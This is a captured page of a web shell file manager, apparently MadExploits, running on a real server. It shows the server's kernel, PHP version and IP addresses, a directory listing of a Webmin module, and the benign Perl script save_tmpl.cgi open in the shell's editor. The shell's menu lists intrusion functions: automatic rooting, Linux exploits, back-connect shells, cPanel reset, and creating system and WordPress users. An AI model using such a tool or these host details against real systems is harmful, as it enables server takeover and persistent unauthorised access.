Linux server.thearyasamaj.org 4.18.0-553.56.1.el8_10.x86_64 #1 SMP Tue Jun 10 05:00:59 EDT 2025 x86_64
Apache
: 103.90.241.146 | : 216.73.216.158
Cant Read [ /etc/named.conf ]
5.6.40
ftpuser@mantra.thearyasamaj.org
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
libexec /
webmin /
virtualmin-init /
[ HOME SHELL ]
Name
Size
Permission
Action
help
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
lang
[ DIR ]
drwxr-xr-x
LICENSE
34.32
KB
-rw-r--r--
cgi_args.pl
506
B
-rwxr-xr-x
config
10
B
-rw-r--r--
config-solaris
9
B
-rw-r--r--
config.info
138
B
-rw-r--r--
config.info.nl
144
B
-rw-r--r--
config.info.no
148
B
-rw-r--r--
defaultacl
12
B
-rw-r--r--
edit.cgi
4.78
KB
-rwxr-xr-x
edit_tmpl.cgi
2.75
KB
-rwxr-xr-x
index.cgi
3.5
KB
-rwxr-xr-x
install-type
4
B
-rw-r--r--
mass.cgi
1.75
KB
-rwxr-xr-x
module.info
128
B
-rw-r--r--
module.info.af.auto
33
B
-rw-r--r--
module.info.ar.auto
45
B
-rw-r--r--
module.info.be.auto
41
B
-rw-r--r--
module.info.bg.auto
68
B
-rw-r--r--
module.info.ca.auto
42
B
-rw-r--r--
module.info.cs.auto
37
B
-rw-r--r--
module.info.da.auto
38
B
-rw-r--r--
module.info.de.auto
33
B
-rw-r--r--
module.info.el.auto
57
B
-rw-r--r--
module.info.es.auto
43
B
-rw-r--r--
module.info.eu.auto
35
B
-rw-r--r--
module.info.fa.auto
41
B
-rw-r--r--
module.info.fi.auto
37
B
-rw-r--r--
module.info.fr.auto
41
B
-rw-r--r--
module.info.he.auto
48
B
-rw-r--r--
module.info.hr.auto
37
B
-rw-r--r--
module.info.hu.auto
49
B
-rw-r--r--
module.info.it.auto
38
B
-rw-r--r--
module.info.ja.auto
40
B
-rw-r--r--
module.info.ko.auto
33
B
-rw-r--r--
module.info.lt.auto
43
B
-rw-r--r--
module.info.lv.auto
43
B
-rw-r--r--
module.info.ms.auto
36
B
-rw-r--r--
module.info.mt.auto
49
B
-rw-r--r--
module.info.nl.auto
33
B
-rw-r--r--
module.info.no.auto
39
B
-rw-r--r--
module.info.pl.auto
41
B
-rw-r--r--
module.info.pt.auto
49
B
-rw-r--r--
module.info.pt_BR.auto
52
B
-rw-r--r--
module.info.ro.auto
39
B
-rw-r--r--
module.info.ru.auto
43
B
-rw-r--r--
module.info.sk.auto
37
B
-rw-r--r--
module.info.sl.auto
35
B
-rw-r--r--
module.info.sv.auto
37
B
-rw-r--r--
module.info.th.auto
73
B
-rw-r--r--
module.info.tr.auto
36
B
-rw-r--r--
module.info.uk.auto
64
B
-rw-r--r--
module.info.ur.auto
51
B
-rw-r--r--
module.info.vi.auto
48
B
-rw-r--r--
module.info.zh.auto
31
B
-rw-r--r--
module.info.zh_TW.auto
34
B
-rw-r--r--
module.nl.info
33
B
-rw-r--r--
module.no.info
39
B
-rw-r--r--
save.cgi
3.51
KB
-rwxr-xr-x
save_tmpl.cgi
1.86
KB
-rwxr-xr-x
template.xml
1.12
KB
-rw-r--r--
virtual_feature.pl
6.12
KB
-rwxr-xr-x
virtualmin-init-lib.pl
16.6
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : save_tmpl.cgi
#!/usr/bin/perl # Create, update or delete some action template use strict; use warnings; our (%access, %text, %in, %config); require './virtualmin-init-lib.pl'; &ReadParse(); $access{'templates'} || &error($text{'tmpl_ecannot'}); my $tmpl; if (!$in{'new'}) { # Get the existing template ($tmpl) = grep { $_->{'id'} == $in{'id'} } &list_action_templates(); } if ($in{'delete'}) { # Just remove the action &delete_action_template($tmpl); &redirect(""); } else { # Validate inputs &error_setup($text{'tmpl_err'}); $in{'desc'} =~ /\S/ || &error($text{'tmpl_edesc'}); $tmpl->{'desc'} = $in{'desc'}; $in{'start'} =~ s/\r//g; $in{'start'} =~ /\S/ || &error($text{'tmpl_estart'}); $tmpl->{'start'} = $in{'start'}; if ($in{'stop_def'}) { $tmpl->{'stop'} = ':kill'; } else { $in{'stop'} =~ s/\r//g; $tmpl->{'stop'} = $in{'stop'}; } if ($in{'xml_def'} || $config{'mode'} ne 'smf') { delete($tmpl->{'xml'}); } else { $in{'xml'} =~ s/\r//g; $in{'xml'} =~ /\S/ || &error($text{'tmpl_exml'}); $tmpl->{'xml'} = $in{'xml'}; } # Validate user-definable parameters for(my $i=0; defined($tmpl->{'pname_'.$i}); $i++) { delete($tmpl->{'pname_'.$i}); delete($tmpl->{'ptype_'.$i}); delete($tmpl->{'pdesc_'.$i}); } for(my $i=0; defined($in{'pname_'.$i}); $i++) { next if (!$in{'pname_'.$i}); $in{'pname_'.$i} =~ /^[a-z0-9_]+$/i || &error(&text('tmpl_epname', $i+1)); $tmpl->{'pname_'.$i} = $in{'pname_'.$i}; $tmpl->{'ptype_'.$i} = $in{'ptype_'.$i}; $in{'pdesc_'.$i} =~ /\S/ || &error(&text('tmpl_epdesc', $i+1)); $tmpl->{'pdesc_'.$i} = $in{'pdesc_'.$i}; if ($tmpl->{'ptype_'.$i} == 3 || $tmpl->{'ptype_'.$i} == 4) { -r $in{'popts_'.$i} || &error(&text('tmpl_epopts', $i+1)); $tmpl->{'popts_'.$i} = $in{'popts_'.$i}; } else { delete($tmpl->{'popts_'.$i}); } } # Create or save &save_action_template($tmpl); &redirect(""); }
Close